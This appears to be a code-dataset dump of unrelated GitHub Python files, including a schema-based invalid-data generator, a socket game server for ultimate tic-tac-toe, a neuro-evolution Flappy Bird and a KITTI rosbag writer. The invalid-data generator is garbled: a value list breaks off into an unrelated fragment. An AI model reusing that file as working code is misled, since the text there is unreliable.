1\nprint(\"总共处理{}张图片\".format(n))","repo_name":"Pilipala-2022/Tool","sub_path":"Rename.py","file_name":"Rename.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31959319558","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport random\nimport re\nimport string\nfrom .datagenerator import DataGenerator\n\nclass InvalidDataGenerator:\n\n invalid_boolean_values = [\"TRUE\", \"FALSE\", \"true \", \"false \", 0, 1]\n invalid_integer_values = [\"1.0\", \"0.0\", \"-0.9999999999999\", \"0.9999999999999\", \n \"1 \", \" 34\", \"45 67\", \" 65 9 \", \"45 str\", \"45str\",\n \"str 5\", \"str5\",\n ]\n invalid_number_values = [\"1.23 \", \" 123.45\", \" 123.45 \", \"123str.45\"]\n invalid_non_string_values = [\" \", \"'\", \"&&\", \"||\", \"☃\",\">\",\" 0:\n local_schema = dict(schema)\n local_schema[\"minLength\"] = local_schema[\"maxLength\"] = schema[\"minLength\"]-1\n invalids.append(self.data_generator.random_string(local_schema))\n\n if \"pattern\" in schema:\n pattern = schema[\"pattern\"]\n\n r_pattern = re.compile(pattern)\n \n if not r_pattern.match(\"\"):\n invalids.append(\"\")\n\n found=0\n for i in range(100):\n length = random.randint(0,100)\n gen = ''.join(random.choice(string.printable) for x in range(length))\n\n print(gen)\n if gen not in invalids and not r_pattern.match(gen):\n\n invalids.append(gen)\n found += 1\n if found == self.invalid_strings:\n break\n return invalids\n\n \n\nif __name__ == \"__main__\":\n generator = InvalidDataGenerator()\n print(generator.invalid_number())\n print(generator.invalid_string({\"pattern\":\"^[a-zA-Z]*$\"}))\n\n","repo_name":"hamstah/apitools","sub_path":"apitools/invaliddatagenerator.py","file_name":"invaliddatagenerator.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"43622672671","text":"\nimport supervisor\nimport time\nimport board\nimport touchio\n\ntouch1 = touchio.TouchIn(board.TOUCH1)\ntouch2 = touchio.TouchIn(board.TOUCH2)\n\nname_is_main = __name__ == '__main__'\n\nwhile name_is_main:\n print('Running code.py')\n print('TOUCH1 for spacebar')\n print('TOUCH2 for midi')\n time.sleep(5)\n if touch1.value or touch2.value:\n supervisor.set_next_code_file('spacebar.py' if touch1.value else 'midi.py')\n supervisor.reload()\n","repo_name":"pcurry/trinkey-trickery","sub_path":"adafruit-proximity-trinkey/CircuitPython/Dual-Load/Spacebar-MIDI/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39413990128","text":"import json\n\nif __name__ == '__main__':\n # read the file normally\n with open('airlines.csv', 'r') as f:\n # header of the csv\n header = f.readline().rstrip().split(',')\n # print(header)\n out1_dict = dict() # Output Dictionary\n for line in f.readlines(): # loop over all the lines\n data = line.rstrip().split(',') # line split by comma saved into list\n name = ','.join(data[1:3])[1:-1] # getting airport name\n out1_dict[name] = 1 + out1_dict.get(name, 0) # filling up dictionary as hashmap\n\n # OUTPUT 1\n output_1 = json.dumps(out1_dict, indent=4) # creating json object\n print('OUTPUT 1: Unique Airport Names & their Counts')\n print(output_1, '\\n')\n\n # OUTPUT 2\n max_cnt_name = max(out1_dict, key=out1_dict.get)\n max_cnt = out1_dict[max_cnt_name]\n print('OUTPUT 3: Airport mentioned most number of times')\n print(f'Name: {max_cnt_name}\\nCount: {max_cnt}\\n')\n\n # OUTPUT 3\n min_cnt_name = min(out1_dict, key=out1_dict.get)\n min_cnt = out1_dict[min_cnt_name]\n print('OUTPUT 2: Airport mentioned least number of times')\n print(f'Name: {min_cnt_name}\\nCount: {min_cnt}\\n')\n","repo_name":"sarthakgupta63/Fyers_Hackathon_Skilleza","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"40500029261","text":"# CCC J2 - 2005 RSA Numbers\n# Park\n# U3 While Loop Review Solution\n\n# IPO\nlower = int(input())\nupper = int(input())\n\nlower_copy = lower\nrsa_counter = 0\n\nwhile lower <= upper:\n factor_counter = 0\n divider = 1\n\n # factor counter\n while divider <= lower:\n if lower % divider == 0:\n factor_counter += 1\n\n divider += 1\n # end of inner while loop\n\n if factor_counter == 4:\n rsa_counter += 1\n\n lower += 1\n# end of while\n\nprint('The number of RSA numbers between', lower_copy, 'and', upper, 'is', rsa_counter)\n","repo_name":"mrparkonline/python3_while","sub_path":"review/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42852326603","text":"import socket\nfrom _thread import start_new_thread\nimport numpy as np\nfrom game import Game\n\n#server = \"93.175.0.37\"\n#server = \"127.0.0.1\"\nserver = \"192.168.0.12\"\nport = 7777\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n s.bind((server, port))\nexcept socket.error as e:\n print(str(e))\n\ns.listen()\nprint(f\"Server started at {server}:{port}, awaiting connection...\")\n\ndef n2xy(n):\n return n%3, n//3\n\npiece = {0:' ', 1: 'X', 2: 'O'}\n\nclass Player():\n\n def __init__(self, id, conn, addr):\n self.id = id\n self.conn = conn\n self.addr = addr\n self.game = None\n self.turn = 0\n self.ready = True\n\n def address(self):\n return ':'.join(str(a) for a in self.addr)\n\ndef send(conn, *args):\n conn.sendall(bytes(args))\n print(\"Sent\", args, \"to\", conn.getpeername())\n\ndef threaded_client(player):\n conn = player.conn\n playing = [other.id for other in players]\n send(conn, player.id, len(playing), *playing)\n reply = \"\"\n while True:\n try:\n data = conn.recv(2048)\n if not data:\n break\n print(f\"{player.address()}: received {data}\")\n action = int(data[0])\n if action == 0: # connect to game\n print(f\"{player.address()}: Attempting to connect to game\")\n if player.game:\n print(f\"{player.address()}: Failed to connect, already connected to a game\")\n send(conn, 0, 4)\n continue\n for game in active_games:\n if game.awaiting:\n if game.player_1 > -1:\n player.game = game\n player.turn = 2\n game.player_2 = player.id\n game.awaiting = False\n game.game_over = False\n print(f\"{player.address()}: Connected to game {game.id} as O, game started\")\n send(conn, 1, game.id % 256, player.turn, game.player_1 % 256)\n for other_player in players:\n if other_player.id == game.player_1:\n send(other_player.conn, 5, player.id)\n elif game.player_2 > -1:\n player.game = game\n player.turn = 1\n game.player_1 = player.id\n game.awaiting = False\n game.game_over = False\n print(f\"{player.address()}: Connected to game {game.id} as X, game started\")\n send(conn, 1, game.id % 256, player.turn, game.player_2 % 256)\n for other_player in players:\n if other_player.id == game.player_2:\n send(other_player.conn, 5, player.id % 256)\n else:\n player.game = game\n game.player_1 = player.id\n player.turn = 1\n print(f\"{player.address()}: Connected to game {game.id} as X, awaiting second player...\")\n playing = [other.id for other in players]\n send(conn, 2, game.id % 256, player.turn, min(len(playing), 255), *playing[-255:])\n if not player.game:\n game = Game(ids[\"game_id\"], player.id)\n ids[\"game_id\"] += 1\n active_games.append(game)\n player.game = game\n player.turn = 1\n print(f\"{player.address()}: Started game {game.id} as X, awaiting second player...\")\n playing = [other.id for other in players]\n send(conn, 2, game.id % 256, player.turn, min(len(playing), 255), *playing[-255:])\n elif action == 1: # play f*c\n field = data[1]\n cell = data[2]\n game = player.game\n if not player.game:\n print(f\"{player.address()}: Failed to play, not connected to a game\")\n send(conn, 0, 0)\n continue\n print(f\"{player.address()}: Attempting to play in game {game.id}: {field}x{cell}\")\n if game.over():\n print(f\"{player.address()}: Failed to play, game {game.id} is over / has not started yet\")\n send(conn, 0, 1)\n continue\n if game.turn != player.turn:\n print(f\"{player.address()}: Failed to play in game {game.id}: turn is {piece[game.turn]}, player is {piece[player.turn]}\")\n send(conn, 0, 2)\n continue\n valid = game.play(field, cell)\n if not valid:\n print(f\"{player.address()}: Failed to play in game {game.id}: invalid cell or field num\")\n send(conn, 0, 3)\n continue\n print(f\"Server: game {game.id}:\\n{game}\")\n send(conn, 3, *game.field.flatten(), *game.main_field, game.active_field % 256)\n if game.over():\n print(f\"Game over, {piece[game.winner]+' won' if game.winner else 'draw'}\")\n send(conn, 4, game.winner)\n player.ready = False\n other = game.player_1\n if player.turn == 1:\n other = game.player_2\n for other_player in players:\n if other_player.id == other:\n send(other_player.conn, 3, *game.field.flatten(), *game.main_field, game.active_field % 256)\n if game.over():\n send(other_player.conn, 4, game.winner)\n other_player.ready = False\n elif action == 2: # request restart game\n if not player.game:\n print(f\"{player.address()}: Failed to restart, not connected to a game\")\n send(conn, 0, 0)\n continue\n if game.awaiting:\n print(f\"{player.address()}: Failed to restart, other player had disconnected\")\n send(conn, 0, 5)\n continue\n player.ready = True\n other_ready = False\n other = game.player_1\n if player.turn == 1:\n other = game.player_2\n for other_player in players:\n if other_player.id == other:\n if other_player.ready:\n other_ready = True\n game.player_1, game.player_2 = game.player_2, game.player_1\n player.turn, other_player.turn = other_player.turn, player.turn\n game.reset()\n game.awaiting = False\n game.game_over = False\n send(conn, 1, game.id % 256, player.turn, other % 256)\n send(other_player.conn, 1, game.id % 256, other_player.turn, player.id % 256)\n else:\n send(other_player.conn, 7)\n if not other_ready:\n send(conn, 7)\n elif action == 3: # bail game\n if not player.game:\n print(f\"{player.address()}: Failed to leave, not connected to a game\")\n send(conn, 0, 0)\n continue\n game = player.game\n print(f\"{player.address()}: Left the game {game.id}\")\n playing = [other.id for other in players]\n send(conn, 2, 255, 0, min(len(playing), 255), *playing[-255:])\n if player.turn == 1:\n game.player_1 = -1\n if game.player_2 == -1:\n print(f\"Server: Closed empty game {game.id}\")\n active_games.remove(game)\n else:\n game.reset()\n game.awaiting = True\n for other_player in players:\n if other_player.id == game.player_2:\n send(other_player.conn, 2, game.id % 256, 2, min(len(playing), 255), *playing[-255:])\n elif player.turn == 2:\n game.player_2 = -1\n if game.player_1 == -1:\n print(f\"Server: Closed empty game {game.id}\")\n active_games.remove(game)\n else:\n game.reset()\n game.awaiting = True\n for other_player in players:\n if other_player.id == game.player_1:\n send(other_player.conn, 2, game.id % 256, 1, min(len(playing), 255), *playing[-255:])\n player.turn = 0\n player.game = None\n elif action == 4: # message to opponent\n game = player.game\n if not game:\n print(f\"{player.address()}: Failed to send, not connected to a game\")\n send(conn, 0, 0)\n continue\n other = game.player_2\n if player.turn == 2:\n other = game.player_1\n if other == -1:\n print(f\"{player.address()}: Failed to send, other player has not connected yet\")\n send(conn, 0, 1)\n continue\n valid = False\n for other_player in players:\n if other_player.id == other:\n other_player.conn.sendall(bytes([6])+bytes([player.id % 256])+bytes([1])+data[1:])\n print(f\"{player.id} to {other}: {data[1:].decode()}\")\n send(conn, 255)\n valid = True\n if not valid:\n print(f\"{player.id} to {other}, which is nobody: {data[1:].decode()}\")\n elif action == 5: # message to everyone\n for other_player in players:\n other_player.conn.sendall(bytes([6])+bytes([player.id % 256])+bytes([0])+data[1:])\n print(f\"{player.id} to everyone: {data[1:].decode()}\")\n else:\n print(f\"{player.address()}: Invalid action {action}\")\n send(conn, 0, 255)\n continue\n except Exception as e:\n print(f\"Error with {player.address()}: {e}\")\n break\n\n if player.game:\n game = player.game\n if player.turn == 1:\n game.player_1 = -1\n game.reset()\n for other_player in players:\n if other_player.id == game.player_2:\n send(other_player.conn, 2, game.id % 256, 2)\n else:\n game.player_2 = -1\n game.reset()\n for other_player in players:\n if other_player.id == game.player_1:\n send(other_player.conn, 2, game.id % 256, 1)\n players.remove(player)\n print(f\"{player.address()}: Disconnected\")\n conn.close()\n\nids = {\n \"game_id\": 0,\n \"player_id\": 0\n}\nactive_games = []\nplayers = []\nwhile True:\n try:\n conn, addr = s.accept()\n player = Player(ids[\"player_id\"], conn, addr)\n ids[\"player_id\"] += 1\n players.append(player)\n print(\"Connected to:\", player.address())\n start_new_thread(threaded_client, (player,))\n except Exception as e:\n print(\"Error: \" + str(e) + \", exiting server...\")\n s.close()\n break\ninput()","repo_name":"vgurnik/Super-Tic-Tac-Toe","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":11901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31369631259","text":"import math\nimport random\nimport time\nimport tkinter\nfrom typing import List\n\nfrom NeuralNet import NeuralNet\n\n# Individual constants:\n# Bird neural net data:\nINPUTS = 2\nHIDDEN = [3]\nOUTPUTS = 1\n# Genetic algorithm constants:\nMUTATION_PROB = 0.2\nCROSSOVER_PROB = 0.5\nMUTATION_MOVE_RANGE = 2\nPOPULATION_SIZE = 50\nMAX_GENERATIONS = math.inf\nTOURNAMENT_SIZE = 10\nHALL_OF_FAME_SIZE = 5\n# Game constants:\nWINDOW_WIDTH = 900\nWINDOW_HEIGHT = 600\nFPS = 30\n# Bird constants:\nDEFAULT_X = 0\nDEFAULT_Y = WINDOW_HEIGHT / 2\nDEFAULT_SPEEDX = 400\nDEFAULT_SPEEDY = 0\nGRAVITY = 1600\nJUMP_FORCE = -600\nBIRD_WIDTH = 40\nBIRD_HEIGHT = 30\n# Walls constants:\nWALL_BETWEEN = 150\nWALL_WIDTH = 50\nWALL_MIN_Y = WALL_BETWEEN\nWALL_MAX_Y = WINDOW_HEIGHT - WALL_BETWEEN\n# Camera constant:\nCAMERA_DELTA_X = 100\n# Constant, how fast show evolution\n# ONLINE = True - birds learns online\n# ONLINE = False - birds learns with maximum speed\nONLINE = False\n\n\nclass Camera:\n x: float\n y: float = 0\n\n def sync(self, obj):\n self.x = obj.x - CAMERA_DELTA_X\n\n def get_x(self, x: float):\n return x - self.x\n\n def get_y(self, y: float):\n return y - self.y\n\n\nclass HitBox:\n def __init__(self, center_coord: tuple, size: tuple):\n self.centerX, self.centerY = center_coord\n self.width, self.height = size\n\n def draw(self, color: str):\n canvas.create_rectangle(camera.get_x(self.centerX - self.width / 2),\n camera.get_y(self.centerY - self.height / 2),\n camera.get_x(self.centerX + self.width / 2),\n camera.get_y(self.centerY + self.height / 2),\n outline=color, width=2)\n\n def hasPoint(self, point: tuple):\n return abs(self.centerX - point[0]) < self.width / 2 and \\\n abs(self.centerY - point[1]) < self.height / 2\n\n def hasStrike(self, other):\n return (\n self.hasPoint((other.centerX - other.width / 2, other.centerY - other.height / 2)) or\n self.hasPoint((other.centerX + other.width / 2, other.centerY - other.height / 2)) or\n self.hasPoint((other.centerX - other.width / 2, other.centerY + other.height / 2)) or\n self.hasPoint((other.centerX + other.width / 2, other.centerY + other.height / 2)) or\n other.hasPoint((self.centerX - self.width / 2, self.centerY - self.height / 2)) or\n other.hasPoint((self.centerX + self.width / 2, self.centerY - self.height / 2)) or\n other.hasPoint((self.centerX - self.width / 2, self.centerY + self.height / 2)) or\n other.hasPoint((self.centerX + self.width / 2, self.centerY + self.height / 2))\n )\n\n\nclass Wall:\n def __init__(self, x: float, y: float):\n self.x = x\n self.y = y\n self.width = WALL_WIDTH\n self.top_hit_box = HitBox((self.x, self.y - WALL_BETWEEN / 2 - WINDOW_HEIGHT / 2), (WALL_WIDTH, WINDOW_HEIGHT))\n self.bottom_hit_box = HitBox((self.x, self.y + WALL_BETWEEN / 2 + WINDOW_HEIGHT / 2), (WALL_WIDTH, WINDOW_HEIGHT))\n\n def __repr__(self):\n return f\"\"\n\n def draw(self):\n self.top_hit_box.draw('green')\n self.bottom_hit_box.draw('green')\n\n\nclass Bird:\n dead = False\n x = DEFAULT_X\n y = DEFAULT_Y\n speedX = DEFAULT_SPEEDX\n speedY = DEFAULT_SPEEDY\n width = BIRD_WIDTH\n height = BIRD_HEIGHT\n\n score: float = 0\n\n def __init__(self, genome = None):\n if genome is None:\n self.genome = NeuralNet(INPUTS, OUTPUTS, HIDDEN).json()['weights']\n else:\n self.genome = genome\n\n def mutate(self):\n for i in range(len(self.genome)):\n if random.random() < MUTATION_PROB:\n self.genome[i] += random.random() * 2 * MUTATION_MOVE_RANGE - MUTATION_MOVE_RANGE\n\n def crossover(self, other):\n for i in range(len(self.genome)):\n if random.random() < CROSSOVER_PROB:\n self.genome[i], other.genome[i] = other.genome[i], self.genome[i]\n\n @property\n def hit_box(self):\n return HitBox((self.x, self.y), (BIRD_WIDTH, BIRD_HEIGHT))\n\n @property\n def net(self):\n return NeuralNet.from_json({\n 'inputs': INPUTS,\n 'outputs': OUTPUTS,\n 'hidden': HIDDEN,\n 'weights': self.genome\n })\n\n def move(self, delta_time):\n self.speedY += GRAVITY * delta_time\n\n self.x += self.speedX * delta_time\n self.y += self.speedY * delta_time\n\n if self.y < 0 or self.y > WINDOW_HEIGHT:\n self.die()\n\n if not self.dead:\n self.score = self.x\n\n def jump(self, nearest_wall: Wall):\n distanceY = nearest_wall.y - self.y\n distanceX = nearest_wall.x + nearest_wall.width / 2 - self.x + self.width / 2\n distanceX /= WINDOW_WIDTH\n distanceY /= WINDOW_HEIGHT\n\n if self.net.push([distanceX, distanceY])[0] < 0.5:\n self.speedY = JUMP_FORCE\n\n def draw(self):\n self.hit_box.draw('red')\n\n def check_strike(self, wall: Wall):\n if self.hit_box.hasStrike(wall.top_hit_box) or self.hit_box.hasStrike(wall.bottom_hit_box):\n self.die()\n\n def die(self):\n if not self.dead:\n self.score = self.x\n self.dead = True\n\n def copy(self):\n return Bird(self.genome[:])\n\n\nclass Generation:\n walls: List[Wall] = []\n\n def __init__(self):\n self.population = []\n while len(self.population) < POPULATION_SIZE:\n self.population.append(Bird())\n\n self.hall_of_fame = []\n\n @property\n def _alive(self):\n return list(filter(lambda bird: not bird.dead,\n self.population))\n\n @property\n def _best_bird(self):\n ans = self.population[0]\n for bird in self.population:\n if bird.score > ans.score:\n ans = bird\n return ans\n\n def _tournament(self):\n winner = random.choice(self.population)\n for i in range(TOURNAMENT_SIZE - 1):\n candidate = random.choice(self.population)\n if candidate.score > winner.score:\n winner = candidate\n return winner.copy()\n\n def _update_walls(self):\n if len(self.walls) == 0 or self.walls[-1].x < self._alive[0].x + WINDOW_WIDTH:\n if len(self.walls) == 0:\n x = WINDOW_HEIGHT\n else:\n x = self.walls[-1].x + WINDOW_HEIGHT\n\n self.walls.append(Wall(x, WALL_MIN_Y + random.random() * (WALL_MAX_Y - WALL_MIN_Y)))\n if self.walls[0].x < self._alive[0].x - WINDOW_WIDTH:\n self.walls = self.walls[1:]\n\n def change_population(self):\n self.hall_of_fame.append(self._best_bird)\n self.hall_of_fame = list(sorted(self.hall_of_fame,\n key=lambda bird: bird.score,\n reverse=True))\n self.hall_of_fame = self.hall_of_fame[:HALL_OF_FAME_SIZE]\n\n new_population = []\n while len(new_population) < POPULATION_SIZE - len(self.hall_of_fame):\n new_population.append(self._tournament())\n for bird1, bird2 in zip(new_population[::2], new_population[1::2]):\n bird1.crossover(bird2)\n for bird in new_population:\n bird.mutate()\n\n for bird in self.hall_of_fame:\n new_population.append(bird.copy())\n\n self.population = new_population\n self.walls = []\n\n def simulate_life(self):\n timer = time.time()\n while len(self._alive) > 0:\n canvas.delete('all')\n\n self._update_walls()\n\n delta_time = time.time() - timer\n timer += delta_time\n for bird in self.population:\n if ONLINE:\n bird.move(delta_time)\n else:\n bird.move(1 / FPS)\n\n for bird in self.population:\n for wall in self.walls:\n bird.check_strike(wall)\n\n nearest_wall = list(filter(\n lambda wall: wall.x + wall.width / 2 > self.population[0].x - self.population[0].width / 2,\n self.walls))[0]\n\n for bird in self.population:\n bird.jump(nearest_wall)\n\n camera.sync(self.population[0])\n for bird in self._alive:\n bird.draw()\n for wall in self.walls:\n wall.draw()\n\n canvas.create_text(150, 25, text=f'Generation: {generation_number}', font='Calibri 25')\n canvas.create_text(150, 50, text=f'Alive: {len(self._alive)}', font='Calibri 25')\n canvas.create_text(150, 75, text=f'Score: {int(self.get_best_score())}', font='Calibri 25')\n canvas.create_text(150, 100, text=f'Top score: {int(max(top_score, self.get_best_score()))}', font='Calibri 25')\n canvas.update()\n\n def get_best_score(self):\n return self._best_bird.score\n\n\nif __name__ == \"__main__\":\n root = tkinter.Tk()\n root.title('Floppy Bird')\n canvas = tkinter.Canvas(root, width=WINDOW_WIDTH, height=WINDOW_HEIGHT)\n canvas.pack()\n camera = Camera()\n\n generation = Generation()\n generation_number = 1\n top_score = 0\n while generation_number <= MAX_GENERATIONS:\n print(\"Generation\", generation_number)\n generation.simulate_life()\n top_score = max(top_score, generation.get_best_score())\n generation.change_population()\n generation_number += 1\n","repo_name":"nalek0/flappy-bird-AI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9537,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"37899724566","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass IndependenceTestModel(nn.Module):\n def __init__(self, config, model_input_dim, hidden_dim):\n super(IndependenceTestModel, self).__init__()\n\n self.config = config\n\n if config[\"feature_type\"] == \"feature\":\n # Model head\n self.classifier = nn.Sequential(\n nn.Linear(model_input_dim, hidden_dim),\n nn.LeakyReLU(),\n nn.Linear(hidden_dim, 2),\n )\n\n else:\n raise AssertionError(\"Unhandled feature type\")\n\n if torch.cuda.is_available():\n self.cuda()\n\n def gen_logits_(self, model_input, type=\"logsoftmax\"):\n \"\"\"\n :param model_input: Pytorch float tensor of size batch x dim\n :return:\n \"\"\"\n\n if self.config[\"feature_type\"] == \"image\":\n raise AssertionError()\n\n logits = self.classifier(model_input)\n\n if type == \"logsoftmax\":\n result = F.log_softmax(logits, dim=1)\n elif type == \"softmax\":\n result = F.softmax(logits, dim=1)\n else:\n raise AssertionError(\"Unhandled type \", type)\n\n return result\n\n def gen_log_prob(self, model_input):\n return self.gen_logits_(model_input, type=\"logsoftmax\")\n\n def gen_prob(self, model_input):\n return self.gen_logits_(model_input, type=\"softmax\")\n","repo_name":"microsoft/Intrepid","sub_path":"src/model/misc/independence_test_model.py","file_name":"independence_test_model.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"94"} +{"seq_id":"7369760557","text":"# to store the IMU/INS measurements as a ROS message\n# for image interpretation and manipulation\n# to read .hdf5 sensor records files\nimport datetime as dt\nimport os\n\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport rosbag\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Imu\n\n\nclass KittiBagGen:\n def __init__(self, imgDir=None, imuDir=None, output_filename=None):\n \"\"\"\n # :param h5_filename: filename to store dataframe as hdf5\n :param imgDir: path to left image directory for sequence\n :param imuDir: path to imu data directory for sequence\n \"\"\"\n # if not h5_filename:\n # raise ValueError(\"Storage filename not provided\")\n # self.h5_filename = str(h5_filename)\n if not output_filename:\n self.of = \"kitti_latest.bag\"\n else:\n self.of = output_filename\n\n if not os.path.isdir(imgDir):\n raise NotADirectoryError\n # check dir contents?\n\n if imuDir and not os.path.isdir(imuDir):\n raise NotADirectoryError\n # check dir contents?\n\n self.imgDir = imgDir\n self.imuDir = imuDir\n\n # self.store = pd.HDFStore('dataset.h5')\n # self.data = pd.DataFrame()\n # self.store[\"data\"] = self.data\n\n self.write_bag()\n\n def write_bag(self):\n img_names = os.listdir(f\"{self.imgDir}/image_0\")\n img_names.sort()\n times = []\n with open(f\"{self.imgDir}/times.txt\") as f:\n times = f.readlines()\n\n if not times:\n raise ValueError('no timestamps extracted')\n\n time_offset = 0.01\n times = [float(i) + time_offset for i in times]\n\n if len(times) != len(img_names):\n raise ValueError('Incompatible timestamp/images list')\n\n # imgs = []\n # for n, name in enumerate(img_names):\n # if n % int(len(img_names) / 10) == 0:\n # print(f\"{n} / {len(img_names)}\")\n # imgs.append(cv2.imread(f\"{self.imgDir}/image_0/{name}\"))\n # self.data.assign(image_0=imgs)\n # del imgs\n\n with rosbag.Bag(self.of, \"w\") as bag:\n\n for i, (t, img_name) in enumerate(zip(times, img_names)):\n if i % int(len(img_names) / 20) == 0:\n print(f\"{2 * i:5d} / {2 * len(img_names):5d} images bagged\")\n image = (\n cv2.imread(f\"{self.imgDir}/image_0/{img_name}\"), cv2.imread(f\"{self.imgDir}/image_1/{img_name}\"))\n # convert from cv2 to ROS\n bridge = (CvBridge(), CvBridge())\n img_msg = (\n bridge[0].cv2_to_imgmsg(image[0], \"passthrough\"), bridge[1].cv2_to_imgmsg(image[1], \"passthrough\"))\n\n # img_msg format:\n # http://docs.ros.org/en/melodic/api/sensor_msgs/html/msg/Image.html\n\n # left image\n img_msg[0].header.stamp.secs = int(np.floor(t))\n img_msg[0].header.stamp.nsecs = int(np.round((t - np.floor(t)) * 10 ** 9, 0))\n img_msg[0].header.seq = i\n # frame source\n img_msg[0].header.frame_id = \"cam0\"\n # definitions for byte handling\n img_msg[0].height = image[0].shape[0]\n img_msg[0].width = image[0].shape[1]\n img_msg[0].step = image[0].shape[1] * image[0].shape[2] # (image width in bytes)\n # encoding\n img_msg[0].encoding = \"bgr8\"\n\n # right image\n img_msg[1].header.stamp.secs = int(np.floor(t))\n img_msg[1].header.stamp.nsecs = int(np.round((t - np.floor(t)) * 10 ** 9, 0))\n img_msg[1].header.seq = i\n # frame source\n img_msg[1].header.frame_id = \"cam0\"\n # definitions for byte handling\n img_msg[1].height = image[1].shape[0]\n img_msg[1].width = image[1].shape[1]\n img_msg[1].step = image[1].shape[1] * image[1].shape[2] # (image width in bytes)\n # encoding\n img_msg[1].encoding = \"bgr8\"\n\n # write image to the bag file under the 'camera/left/image_raw' topic\n bag.write(\"/cam0/image_raw\", img_msg[0], img_msg[0].header.stamp)\n bag.write(\"/cam1/image_raw\", img_msg[1], img_msg[1].header.stamp)\n\n if self.imuDir:\n imus = os.listdir(f\"{self.imuDir}/data\")\n imus.sort()\n times = []\n with open(f\"{self.imuDir}/times.txt\", \"r\") as f:\n init_time = None\n zero_timedelta = dt.datetime(1900, 1, 1)\n for time in f.readlines():\n time, nanoseconds = time.strip().split('.')\n nanoseconds = float(nanoseconds) / (10 ** 9)\n timedt = dt.datetime.strptime(time, \"%Y-%m-%d %H:%M:%S\")\n time = (timedt - zero_timedelta).total_seconds() + nanoseconds\n if not init_time:\n init_time = time\n time = time - init_time + time_offset\n times.append(time)\n\n imu_keys = [\"timestamp\"]\n with open(f\"{self.imuDir}/dataformat.txt\", \"r\") as f:\n line = f.readline()\n while line:\n imu_keys.append(line.strip().split(\":\")[0])\n line = f.readline()\n\n imu_data = []\n for filename, timestamp in zip(imus, times):\n with open(f\"{self.imuDir}/data/{filename}\") as f:\n vals = f.readline().strip().split(' ')\n imu_data.append([timestamp, *[float(i) for i in vals]])\n data = pd.DataFrame(imu_data, columns=imu_keys)\n\n for i in range(data.shape[0]):\n repeat_count = 2\n\n if i % int(data.shape[0] / 10) == 0:\n print(f\"{i * repeat_count:5d} / {data.shape[0] * repeat_count:5d} imu points bagged\")\n\n for j in range(repeat_count):\n imu_msg = Imu()\n\n # imu_msg format:\n # http://docs.ros.org/en/melodic/api/sensor_msgs/html/msg/Imu.html\n\n # ---------- IMU RECORD ---------- #\n # header info\n imu_msg.header.frame_id = \"/imu0\"\n imu_msg.header.seq = i\n t = data.loc[i][\"timestamp\"] + 0.01 * j\n imu_msg.header.stamp.secs = int(np.floor(t))\n imu_msg.header.stamp.nsecs = int(np.round((t - np.floor(t)) * 10 ** 9, 0))\n\n imu_msg.orientation.w = 1.0\n imu_msg.orientation_covariance = [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]\n\n # linear accelerations (m/s^2)\n imu_msg.linear_acceleration.x = data.loc[i][\"ax\"] / float(repeat_count)\n imu_msg.linear_acceleration.y = data.loc[i][\"ay\"] / float(repeat_count)\n imu_msg.linear_acceleration.z = data.loc[i][\"az\"] / float(repeat_count)\n\n # angular rates (rad/s)\n imu_msg.angular_velocity.x = data.loc[i][\"wx\"] / float(repeat_count)\n imu_msg.angular_velocity.y = data.loc[i][\"wy\"] / float(repeat_count)\n imu_msg.angular_velocity.z = data.loc[i][\"wz\"] / float(repeat_count)\n\n # imu_msg.orientation_covariance = [-1 for i in imu_msg.orientation_covariance]\n\n # write the imu_msg to the bag file\n bag.write(\"imu0\", imu_msg, imu_msg.header.stamp)\n\n print(\"Bag closed, process complete\")\n\n\nif __name__ == \"__main__\":\n for seq in range(0, 1):\n kg = KittiBagGen(imgDir=f\"/home/dom-ubuntu/Documents/fyp/datasets/kitti/data_odometry_gray/dataset/sequences/{seq:02d}\",\n imuDir=f\"/home/dom-ubuntu/Documents/fyp/datasets/kitti/data_odometry_imu/dataset/sequences/{seq:02d}\",\n output_filename=f\"/home/dom-ubuntu/Documents/kitti_{seq:02d}.bag\")\n","repo_name":"domRG/rosbag_tools","sub_path":"bag_kitti.py","file_name":"bag_kitti.py","file_ext":"py","file_size_in_byte":8326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"30202701191","text":"\nf = open('Data/similarLengthFiles.txt', 'r')\nfLines = f.readlines()\nf.close()\n\nsimilarityThresh = 90\nrelevantFiles = set()\nblackList = set()\n\nfor line in fLines:\n line = line.rstrip('\\n')\n files = line.split('\\t')\n \n fileData0 = files[0].split(' ')\n fileName0 = fileData0[0]\n filePercent0 = int(fileData0[1][1:-2])\n\n fileData1 = files[1].split(' ')\n fileName1 = fileData1[0]\n filePercent1 = int(fileData1[1][1:-2])\n\n print(f'{fileName0} {filePercent0} {fileName1} {filePercent1}')\n\n # check if either file is in the black list first\n if fileName0 in blackList:\n relevantFiles.add(fileName1)\n elif fileName1 in blackList:\n relevantFiles.add(fileName0)\n else:\n # first check if either files are above the similarity threshold\n if (filePercent0 > similarityThresh) or (filePercent1 > 